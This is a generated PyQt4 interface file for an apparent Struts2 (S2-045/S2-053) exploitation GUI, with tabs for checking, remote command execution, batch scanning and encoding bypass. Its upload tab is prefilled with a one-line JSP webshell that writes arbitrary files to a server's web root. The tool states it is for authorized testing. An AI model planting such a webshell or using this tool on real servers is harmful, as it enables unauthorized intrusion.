# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'E:\CodeProject\PyQtProject\Struts\untitled.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!

from PyQt4 import QtCore, QtGui

try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        return s

try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)

class Ui_MainWindow(object):
    def setupUi(self, MainWindow):
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(710, 511)
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
        self.label = QtGui.QLabel(self.centralwidget)
        self.label.setGeometry(QtCore.QRect(10, 10, 31, 21))
        self.label.setObjectName(_fromUtf8("label"))
        self.lineEdit_url = QtGui.QLineEdit(self.centralwidget)
        self.lineEdit_url.setGeometry(QtCore.QRect(40, 10, 601, 21))
        self.lineEdit_url.setObjectName(_fromUtf8("lineEdit_url"))
        self.tabWidget = QtGui.QTabWidget(self.centralwidget)
        self.tabWidget.setGeometry(QtCore.QRect(0, 40, 711, 451))
        self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
        self.tab_test = QtGui.QWidget()
        self.tab_test.setObjectName(_fromUtf8("tab_test"))
        self.text_info = QtGui.QTextEdit(self.tab_test)
        self.text_info.setGeometry(QtCore.QRect(0, 0, 711, 431))
        self.text_info.setReadOnly(True)
        self.text_info.setObjectName(_fromUtf8("text_info"))
        self.tabWidget.addTab(self.tab_test, _fromUtf8(""))
        self.tab_cmd = QtGui.QWidget()
        self.tab_cmd.setObjectName(_fromUtf8("tab_cmd"))
        self.pushButton_cmd = QtGui.QPushButton(self.tab_cmd)
        self.pushButton_cmd.setGeometry(QtCore.QRect(630, 10, 71, 21))
        self.pushButton_cmd.setObjectName(_fromUtf8("pushButton_cmd"))
        self.label_2 = QtGui.QLabel(self.tab_cmd)
        self.label_2.setGeometry(QtCore.QRect(10, 10, 31, 20))
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.lineEdit_cmd = QtGui.QLineEdit(self.tab_cmd)
        self.lineEdit_cmd.setGeometry(QtCore.QRect(50, 10, 571, 21))
        self.lineEdit_cmd.setObjectName(_fromUtf8("lineEdit_cmd"))
        self.text_cmd = QtGui.QTextEdit(self.tab_cmd)
        self.text_cmd.setGeometry(QtCore.QRect(0, 40, 711, 391))
        self.text_cmd.setReadOnly(True)
        self.text_cmd.setObjectName(_fromUtf8("text_cmd"))
        self.tabWidget.addTab(self.tab_cmd, _fromUtf8(""))
        self.tab_upload = QtGui.QWidget()
        self.tab_upload.setObjectName(_fromUtf8("tab_upload"))
        self.lineEdit_upload = QtGui.QLineEdit(self.tab_upload)
        self.lineEdit_upload.setGeometry(QtCore.QRect(80, 10, 541, 21))
        self.lineEdit_upload.setObjectName(_fromUtf8("lineEdit_upload"))
        self.pushButton_upload = QtGui.QPushButton(self.tab_upload)
        self.pushButton_upload.setGeometry(QtCore.QRect(630, 10, 71, 21))
        self.pushButton_upload.setObjectName(_fromUtf8("pushButton_upload"))
        self.pushButton_getpath = QtGui.QPushButton(self.tab_upload)
        self.pushButton_getpath.setGeometry(QtCore.QRect(0, 10, 71, 21))
        self.pushButton_getpath.setObjectName(_fromUtf8("pushButton_getpath"))
        self.text_upload = QtGui.QPlainTextEdit(self.tab_upload)
        self.text_upload.setGeometry(QtCore.QRect(0, 40, 711, 391))
        self.text_upload.setObjectName(_fromUtf8("text_upload"))
        self.tabWidget.addTab(self.tab_upload, _fromUtf8(""))
        self.tab_all = QtGui.QWidget()
        self.tab_all.setObjectName(_fromUtf8("tab_all"))
        self.pushButton_allload = QtGui.QPushButton(self.tab_all)
        self.pushButton_allload.setGeometry(QtCore.QRect(0, 0, 75, 21))
        self.pushButton_allload.setObjectName(_fromUtf8("pushButton_allload"))
        self.pushButton_alltest = QtGui.QPushButton(self.tab_all)
        self.pushButton_alltest.setGeometry(QtCore.QRect(470, 0, 75, 21))
        self.pushButton_alltest.setObjectName(_fromUtf8("pushButton_alltest"))
        self.pushButton_allstop = QtGui.QPushButton(self.tab_all)
        self.pushButton_allstop.setGeometry(QtCore.QRect(550, 0, 75, 21))
        self.pushButton_allstop.setObjectName(_fromUtf8("pushButton_allstop"))
        self.pushButton_allexport = QtGui.QPushButton(self.tab_all)
        self.pushButton_allexport.setGeometry(QtCore.QRect(630, 0, 75, 21))
        self.pushButton_allexport.setObjectName(_fromUtf8("pushButton_allexport"))
        self.lineEdit_all = QtGui.QLineEdit(self.tab_all)
        self.lineEdit_all.setGeometry(QtCore.QRect(80, 0, 381, 21))
        self.lineEdit_all.setObjectName(_fromUtf8("lineEdit_all"))
        self.treeWidget = QtGui.QTreeWidget(self.tab_all)
        self.treeWidget.setGeometry(QtCore.QRect(0, 20, 711, 411))
        self.treeWidget.setObjectName(_fromUtf8("treeWidget"))
        self.tabWidget.addTab(self.tab_all, _fromUtf8(""))
        self.tab_setting = QtGui.QWidget()
        self.tab_setting.setObjectName(_fromUtf8("tab_setting"))
        self.groupBox = QtGui.QGroupBox(self.tab_setting)
        self.groupBox.setGeometry(QtCore.QRect(0, 250, 221, 81))
        self.groupBox.setCheckable(True)
        self.groupBox.setChecked(False)
        self.groupBox.setObjectName(_fromUtf8("groupBox"))
        self.label_3 = QtGui.QLabel(self.groupBox)
        self.label_3.setGeometry(QtCore.QRect(10, 20, 41, 16))
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.label_4 = QtGui.QLabel(self.groupBox)
        self.label_4.setGeometry(QtCore.QRect(10, 50, 41, 16))
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.lineEdit_proxyhost = QtGui.QLineEdit(self.groupBox)
        self.lineEdit_proxyhost.setGeometry(QtCore.QRect(60, 20, 151, 20))
        self.lineEdit_proxyhost.setObjectName(_fromUtf8("lineEdit_proxyhost"))
        self.lineEdit_proxyport = QtGui.QLineEdit(self.groupBox)
        self.lineEdit_proxyport.setGeometry(QtCore.QRect(60, 50, 151, 20))
        self.lineEdit_proxyport.setObjectName(_fromUtf8("lineEdit_proxyport"))
        self.groupBox_2 = QtGui.QGroupBox(self.tab_setting)
        self.groupBox_2.setGeometry(QtCore.QRect(0, 340, 221, 81))
        self.groupBox_2.setCheckable(True)
        self.groupBox_2.setChecked(False)
        self.groupBox_2.setObjectName(_fromUtf8("groupBox_2"))
        self.label_5 = QtGui.QLabel(self.groupBox_2)
        self.label_5.setGeometry(QtCore.QRect(10, 20, 41, 16))
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.label_6 = QtGui.QLabel(self.groupBox_2)
        self.label_6.setGeometry(QtCore.QRect(10, 50, 41, 16))
        self.label_6.setObjectName(_fromUtf8("label_6"))
        self.lineEdit_authname = QtGui.QLineEdit(self.groupBox_2)
        self.lineEdit_authname.setGeometry(QtCore.QRect(60, 20, 151, 20))
        self.lineEdit_authname.setObjectName(_fromUtf8("lineEdit_authname"))
        self.lineEdit_authpwd = QtGui.QLineEdit(self.groupBox_2)
        self.lineEdit_authpwd.setGeometry(QtCore.QRect(60, 50, 151, 20))
        self.lineEdit_authpwd.setObjectName(_fromUtf8("lineEdit_authpwd"))
        self.groupBox_3 = QtGui.QGroupBox(self.tab_setting)
        self.groupBox_3.setGeometry(QtCore.QRect(230, 10, 471, 111))
        self.groupBox_3.setCheckable(True)
        self.groupBox_3.setChecked(True)
        self.groupBox_3.setObjectName(_fromUtf8("groupBox_3"))
        self.label_7 = QtGui.QLabel(self.groupBox_3)
        self.label_7.setGeometry(QtCore.QRect(10, 50, 41, 16))
        self.label_7.setObjectName(_fromUtf8("label_7"))
        self.lineEdit_ua = QtGui.QLineEdit(self.groupBox_3)
        self.lineEdit_ua.setGeometry(QtCore.QRect(60, 20, 401, 20))
        self.lineEdit_ua.setObjectName(_fromUtf8("lineEdit_ua"))
        self.label_8 = QtGui.QLabel(self.groupBox_3)
        self.label_8.setGeometry(QtCore.QRect(30, 20, 21, 21))
        self.label_8.setObjectName(_fromUtf8("label_8"))
        self.plainTextEdit_cookie = QtGui.QPlainTextEdit(self.groupBox_3)
        self.plainTextEdit_cookie.setGeometry(QtCore.QRect(60, 50, 401, 51))
        self.plainTextEdit_cookie.setObjectName(_fromUtf8("plainTextEdit_cookie"))
        self.groupBox_4 = QtGui.QGroupBox(self.tab_setting)
        self.groupBox_4.setGeometry(QtCore.QRect(0, 10, 221, 141))
        self.groupBox_4.setCheckable(True)
        self.groupBox_4.setChecked(True)
        self.groupBox_4.setObjectName(_fromUtf8("groupBox_4"))
        self.label_9 = QtGui.QLabel(self.groupBox_4)
        self.label_9.setGeometry(QtCore.QRect(10, 20, 61, 16))
        self.label_9.setObjectName(_fromUtf8("label_9"))
        self.label_10 = QtGui.QLabel(self.groupBox_4)
        self.label_10.setGeometry(QtCore.QRect(10, 50, 61, 16))
        self.label_10.setObjectName(_fromUtf8("label_10"))
        self.comboBox = QtGui.QComboBox(self.groupBox_4)
        self.comboBox.setGeometry(QtCore.QRect(80, 20, 91, 22))
        self.comboBox.setObjectName(_fromUtf8("comboBox"))
        self.comboBox.addItem(_fromUtf8(""))
        self.comboBox.addItem(_fromUtf8(""))
        self.comboBox.addItem(_fromUtf8(""))
        self.comboBox_2 = QtGui.QComboBox(self.groupBox_4)
        self.comboBox_2.setGeometry(QtCore.QRect(80, 50, 91, 22))
        self.comboBox_2.setObjectName(_fromUtf8("comboBox_2"))
        self.comboBox_2.addItem(_fromUtf8(""))
        self.comboBox_2.addItem(_fromUtf8(""))
        self.comboBox_3 = QtGui.QComboBox(self.groupBox_4)
        self.comboBox_3.setGeometry(QtCore.QRect(80, 80, 91, 22))
        self.comboBox_3.setObjectName(_fromUtf8("comboBox_3"))
        self.comboBox_3.addItem(_fromUtf8(""))
        self.comboBox_3.addItem(_fromUtf8(""))
        self.comboBox_3.addItem(_fromUtf8(""))
        self.label_11 = QtGui.QLabel(self.groupBox_4)
        self.label_11.setGeometry(QtCore.QRect(10, 80, 61, 16))
        self.label_11.setObjectName(_fromUtf8("label_11"))
        self.label_13 = QtGui.QLabel(self.groupBox_4)
        self.label_13.setGeometry(QtCore.QRect(10, 110, 61, 16))
        self.label_13.setObjectName(_fromUtf8("label_13"))
        self.comboBox_mod = QtGui.QComboBox(self.groupBox_4)
        self.comboBox_mod.setGeometry(QtCore.QRect(80, 110, 91, 22))
        self.comboBox_mod.setObjectName(_fromUtf8("comboBox_mod"))
        self.groupBox_5 = QtGui.QGroupBox(self.tab_setting)
        self.groupBox_5.setGeometry(QtCore.QRect(0, 160, 221, 81))
        self.groupBox_5.setCheckable(True)
        self.groupBox_5.setChecked(True)
        self.groupBox_5.setObjectName(_fromUtf8("groupBox_5"))
        self.label_12 = QtGui.QLabel(self.groupBox_5)
        self.label_12.setGeometry(QtCore.QRect(10, 20, 41, 16))
        self.label_12.setObjectName(_fromUtf8("label_12"))
        self.label_14 = QtGui.QLabel(self.groupBox_5)
        self.label_14.setGeometry(QtCore.QRect(10, 50, 41, 16))
        self.label_14.setObjectName(_fromUtf8("label_14"))
        self.spinBox_threads = QtGui.QSpinBox(self.groupBox_5)
        self.spinBox_threads.setGeometry(QtCore.QRect(60, 20, 71, 22))
        self.spinBox_threads.setSingleStep(1)
        self.spinBox_threads.setProperty("value", 10)
        self.spinBox_threads.setObjectName(_fromUtf8("spinBox_threads"))
        self.spinBox_timeout = QtGui.QSpinBox(self.groupBox_5)
        self.spinBox_timeout.setGeometry(QtCore.QRect(60, 50, 71, 22))
        self.spinBox_timeout.setMaximum(300)
        self.spinBox_timeout.setSingleStep(10)
        self.spinBox_timeout.setProperty("value", 60)
        self.spinBox_timeout.setObjectName(_fromUtf8("spinBox_timeout"))
        self.tabWidget.addTab(self.tab_setting, _fromUtf8(""))
        self.pushButton_info = QtGui.QPushButton(self.centralwidget)
        self.pushButton_info.setGeometry(QtCore.QRect(650, 10, 51, 23))
        self.pushButton_info.setObjectName(_fromUtf8("pushButton_info"))
        MainWindow.setCentralWidget(self.centralwidget)
        self.statusBar = QtGui.QStatusBar(MainWindow)
        self.statusBar.setObjectName(_fromUtf8("statusBar"))
        MainWindow.setStatusBar(self.statusBar)

        self.retranslateUi(MainWindow)
        self.tabWidget.setCurrentIndex(0)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        MainWindow.setWindowTitle(_translate("MainWindow", "Struts2漏洞利用工具【天融信广州安服工具组】", None))
        self.label.setText(_translate("MainWindow", "地址", None))
        self.lineEdit_url.setText(_translate("MainWindow", "http://127.0.0.1/index.action", None))
        self.text_info.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'SimSun\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt; font-weight:600; color:#df101b;\">该工具仅用来检测网站的是否存在安全漏洞，仅用作授权测试。</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt; font-weight:600; color:#df101b;\">严禁用于非法途径，严禁用于商业目的，否则后果自负。</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; color:#df101b;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">1、点击&quot;验证&quot;，会自动检测该URL是否存在S2-045漏洞。</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">2、上传时先点击获取路径，在路径后面加文件名称，在下面文本框中写入一句话木马，再点击写入按钮。暂时只能传小马。</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">by：天融信广州安服工具组</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">更新日志</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">==========================================</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">20170308 V0.1版 检测st2-045漏洞</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">20170907 V0.2版 检测st2-053漏洞</p></body></html>", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_test), _translate("MainWindow", "验证", None))
        self.pushButton_cmd.setText(_translate("MainWindow", "执行", None))
        self.label_2.setText(_translate("MainWindow", "命令", None))
        self.lineEdit_cmd.setText(_translate("MainWindow", "whoami", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_cmd), _translate("MainWindow", "执行", None))
        self.pushButton_upload.setText(_translate("MainWindow", "写入", None))
        self.pushButton_getpath.setText(_translate("MainWindow", "获取路径", None))
        self.text_upload.setPlainText(_translate("MainWindow", "0<% if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.getRealPath(\"/\")+request.getParameter(\"f\"))).write(request.getParameter(\"t\").getBytes()); %>1\n"
"", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_upload), _translate("MainWindow", "上传", None))
        self.pushButton_allload.setText(_translate("MainWindow", "导入", None))
        self.pushButton_alltest.setText(_translate("MainWindow", "验证", None))
        self.pushButton_allstop.setText(_translate("MainWindow", "停止", None))
        self.pushButton_allexport.setText(_translate("MainWindow", "导出", None))
        self.treeWidget.headerItem().setText(0, _translate("MainWindow", "序号", None))
        self.treeWidget.headerItem().setText(1, _translate("MainWindow", "地址", None))
        self.treeWidget.headerItem().setText(2, _translate("MainWindow", "验证", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_all), _translate("MainWindow", "批量", None))
        self.groupBox.setTitle(_translate("MainWindow", "代理设置", None))
        self.label_3.setText(_translate("MainWindow", "主  机", None))
        self.label_4.setText(_translate("MainWindow", "端  口", None))
        self.groupBox_2.setTitle(_translate("MainWindow", "认证设置", None))
        self.label_5.setText(_translate("MainWindow", "用户名", None))
        self.label_6.setText(_translate("MainWindow", "密  码", None))
        self.groupBox_3.setTitle(_translate("MainWindow", "请求头", None))
        self.label_7.setText(_translate("MainWindow", "COOKIE", None))
        self.label_8.setText(_translate("MainWindow", "UA", None))
        self.groupBox_4.setTitle(_translate("MainWindow", "编码设置", None))
        self.label_9.setText(_translate("MainWindow", "编码方式", None))
        self.label_10.setText(_translate("MainWindow", "提交方式", None))
        self.comboBox.setItemText(0, _translate("MainWindow", "UTF8", None))
        self.comboBox.setItemText(1, _translate("MainWindow", "GBK", None))
        self.comboBox.setItemText(2, _translate("MainWindow", "GB2312", None))
        self.comboBox_2.setItemText(0, _translate("MainWindow", "POST", None))
        self.comboBox_2.setItemText(1, _translate("MainWindow", "UPLOAD", None))
        self.comboBox_3.setItemText(0, _translate("MainWindow", "+", None))
        self.comboBox_3.setItemText(1, _translate("MainWindow", "%20", None))
        self.comboBox_3.setItemText(2, _translate("MainWindow", "\\40", None))
        self.label_11.setText(_translate("MainWindow", "编码绕过", None))
        self.label_13.setText(_translate("MainWindow", "漏洞模式", None))
        self.groupBox_5.setTitle(_translate("MainWindow", "其它设置", None))
        self.label_12.setText(_translate("MainWindow", "线  程", None))
        self.label_14.setText(_translate("MainWindow", "超  时", None))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_setting), _translate("MainWindow", "设置", None))
        self.pushButton_info.setText(_translate("MainWindow", "验证", None))

